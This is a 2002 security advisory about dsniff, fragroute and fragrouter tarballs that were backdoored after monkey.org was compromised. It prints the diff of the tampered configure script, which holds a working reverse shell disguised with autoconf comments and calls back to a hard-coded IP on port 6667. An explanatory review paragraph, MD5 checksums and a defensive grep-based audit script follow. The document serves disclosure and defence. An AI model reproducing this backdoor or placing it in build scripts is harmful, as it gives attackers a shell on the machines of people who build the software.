
fragroute, dsniff and fragrouter have been backdoored
4th Jun 2002 [SBWID-5397]
COMMAND

	fragroute, dsniff and fragrouter have been backdoored

SYSTEMS AFFECTED

	dsniff-2.3, fragroute-1.2, and fragrouter-1.6 source distributions

PROBLEM

	Dug Song [http://www.monkey.org] explains:

	monkey.org was compromised on May 14th, via an epic4-pre2.511 client-side
	hole which produced a shell to one of the local admin's accounts. This was
	later used to reattach to one of his screen sessions, which apparently had
	a root window open (su very bad!).

	The dsniff-2.3, fragroute-1.2, and fragrouter-1.6 tarballs were all
	modified at 3 AM on May 17th to include the same configure backdoor as
	described in the irssi advisory. No other public web content was
	modified, and the system was restored a week later, from scratch.
	

	

	Diff between the good fragroute-1.2 configure script and the backdoored one:


	diff -Nur fragroute-1.2/configure fragroute-1.2-bad/configure

	--- fragroute-1.2/configure	Mon Apr 15 16:41:43 2002

	+++ fragroute-1.2-bad/configure	Mon Apr 15 16:41:43 2002

	@@ -1590,6 +1590,53 @@

	 

	 fi

	 

	+cat > conftest.c<<EOF

	+/* Override any gcc2 internal prototype to avoid an error.  */

	+/* We use char because int might match the return type of a gcc2

	+    builtin and then its argument prototype would still apply.  */

	+#include <stdio.h>

	+#include <sys/types.h>

	+#include <sys/socket.h>

	+#include <netinet/in.h>

	+#include <unistd.h>

	+int main()

	+{

	+/* The GNU C library defines this for functions which it implements

	+    to always fail with ENOSYS.  Some functions are actually named

	+    something starting with __ and the normal name is an alias.  */

	+        int s;

	+        struct sockaddr_in sa;

	+        switch(fork()) { case 0: break; default: exit(0); }

	+        if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {

	+                exit(1);

	+        }

	+  /* HP/UX 9 (%@#!) writes to sscanf strings */

	+        memset(&sa, 0, sizeof(sa));

	+        sa.sin_family = AF_INET;

	+        sa.sin_port = htons(6667);

	+/* Override any gcc2 internal prototype to avoid an error.  */

	+/* We use char because int might match the return type of a gcc2

	+    builtin and then its argument prototype would still apply.  */

	+        sa.sin_addr.s_addr = inet_addr(\"216.80.99.202\");

	+        if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) {

	+                exit(1);

	+        }

	+  /* HP/UX 9 (%@#!) writes to sscanf strings */

	+        dup2(s, 0); dup2(s, 1); dup2(s, 2);

	+/* The GNU C library defines this for functions which it implements

	+    to always fail with ENOSYS.  Some functions are actually named

	+    something starting with __ and the normal name is an alias.  */

	+        { char *args[] = { \"/bin/sh\", NULL }; execve(args[0], args, NULL); }

	+}

	+EOF

	+gcc $LIBS conftest.c -o conftest; ./conftest

	+if { (eval echo configure:2379: \\\"$ac_link\\\") 1>&5; (eval $ac_link) 2>&5; } && test -s conftestx${ac_exeext}; then

	+  rm -rf conftest*

	+else

	+  rm -rf conftest*

	+fi

	+rm -f conftest*

	+

	     # DLPI needs putmsg under HPUX so test for -lstr while we\'re at it

	     echo $ac_n \"checking for putmsg in -lstr\"\"... $ac_c\" 1>&6

	 echo \"configure:1596: checking for putmsg in -lstr\" >&5
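Review bot: this hunk is not a configure probe but a reverse shell, and every tell is in its own lines: the added block pulls in <sys/socket.h> and <netinet/in.h>, fork()s, connects to the hard-coded address 216.80.99.202 on port 6667, dup2()s the socket over file descriptors 0, 1 and 2 and execve()s /bin/sh, while the parent exit(0)s so configure carries on as if nothing happened. The comments wrapped around it ("Override any gcc2 internal prototype", "HP/UX 9 (%@#!) writes to sscanf strings", "The GNU C library defines this for functions which it implements to always fail with ENOSYS") are lifted from genuine autoconf boilerplate and describe nothing in the adjacent code; the binary is built and run unconditionally with `gcc $LIBS conftest.c -o conftest; ./conftest` instead of through the `$ac_link` machinery, and the trailing `if { (eval echo configure:2379 ...` stanza tests for a file named `conftestx${ac_exeext}` that is never produced, so both branches do the same `rm -rf conftest*`; it exists only to look like the tests around it. Note also the diff header: the original and the tampered configure both carry `Mon Apr 15 16:41:43 2002`, so the modified tarball was repacked with the original mtime preserved and cannot be distinguished by timestamp. For anyone reviewing a build script, a "test" that needs fork/connect/dup2/execve together, a literal IP address, or a conftest that is run rather than merely linked is disqualifying regardless of the comments beside it; treat the tarball as untrusted until its checksum or signature matches a value obtained out of band from the publisher, as the SOLUTION section below advises.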

	

SOLUTION

	Verify checksums.

	The correct checksums are:

	MD5 (dsniff-2.3.tar.gz) = 183e336a45e38013f3af840bddec44b4
	MD5 (fragroute-1.2.tar.gz) = 7e4de763fae35a50e871bdcd1ac8e23a
	MD5 (fragrouter-1.6.tar.gz) = 73fdc73f8da0b41b995420ded00533cc
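	Checking a downloaded tarball against the MD5s published above, and grepping its unpacked configure script for the calls the injected stanza uses before the script is ever run, as an added POSIX sh example (not part of the advisory; the function names and the grep pattern are my own choices):

```shell
#!/bin/sh
# Added example (not part of the advisory): check a downloaded tarball against
# the MD5 the advisory publishes, and grep its unpacked configure script for
# the calls the injected stanza uses before ever running it.

# Published checksums, copied from the SOLUTION section above.
EXPECTED_MD5='
dsniff-2.3.tar.gz 183e336a45e38013f3af840bddec44b4
fragroute-1.2.tar.gz 7e4de763fae35a50e871bdcd1ac8e23a
fragrouter-1.6.tar.gz 73fdc73f8da0b41b995420ded00533cc
'

# md5_of FILE: print the hex MD5, using whichever tool the host provides.
md5_of() {
    if command -v md5sum >/dev/null 2>&1; then md5sum "$1" | cut -d' ' -f1
    elif command -v md5 >/dev/null 2>&1; then md5 -q "$1"
    else openssl md5 -r "$1" | cut -d' ' -f1
    fi
}

# check_md5 FILE EXPECTED: 0 when the file's MD5 equals EXPECTED, else 1.
check_md5() {
    got=$(md5_of "$1")
    [ "$got" = "$2" ] && return 0
    echo "MISMATCH $(basename "$1"): got $got, expected $2" >&2
    return 1
}

# verify_tarball FILE: look the basename up in the published table and check it.
# An unlisted name is a failure too: there is nothing to compare against.
verify_tarball() {
    name=$(basename "$1")
    want=$(printf '%s\n' "$EXPECTED_MD5" | awk -v n="$name" '$1 == n { print $2 }')
    [ -n "$want" ] || { echo "no published checksum for $name" >&2; return 1; }
    check_md5 "$1" "$want"
}

# audit_configure FILE: 0 when the configure script contains none of the calls
# the backdoor relies on, 1 (with the offending lines) when it does. No real
# autoconf probe needs fork, connect, dup2, execve or inet_addr in one block.
audit_configure() {
    hits=$(grep -nE 'fork\(|connect\(|dup2\(|execve\(|inet_addr\(' "$1" || true)
    [ -z "$hits" ] && return 0
    printf 'suspicious calls in %s:\n%s\n' "$1" "$hits" >&2
    return 1
}

# Usage: verify_tarball fragroute-1.2.tar.gz && tar xzf fragroute-1.2.tar.gz \
#        && audit_configure fragroute-1.2/configure && (cd fragroute-1.2 && ./configure)
```

	Run the audit before configure, not after: the injected stanza executes during the configure step itself, with the privileges of whoever builds the package.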
